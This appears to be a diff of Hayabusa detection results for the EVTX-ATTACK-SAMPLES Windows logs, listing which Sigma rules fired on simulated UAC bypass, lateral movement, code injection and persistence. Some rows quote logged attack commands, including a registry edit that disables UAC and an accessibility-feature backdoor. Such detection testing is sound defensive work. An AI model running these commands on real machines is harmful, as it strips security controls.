+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  /groups  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  /groups  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe""  :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe""   :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe""   :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe""   :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
+2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding  :  Path: C:\Windows\System32\winrshost.exe  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig  :  Path: C:\Windows\System32\cmd.exe  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\WinrsHost.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig  :  Path: C:\Windows\System32\ipconfig.exe  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management  :  Command: ""C:\Windows\system32\HOSTNAME.EXE""  :  Path: C:\Windows\System32\HOSTNAME.EXE  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
+2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry  :  Command: reg  add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f  :  Path: C:\Windows\System32\reg.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features  :  Command: ""C:\Windows\System32\osk.exe""    :  Path: C:\Windows\System32\osk.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery  :  Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\osk.exe""  ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
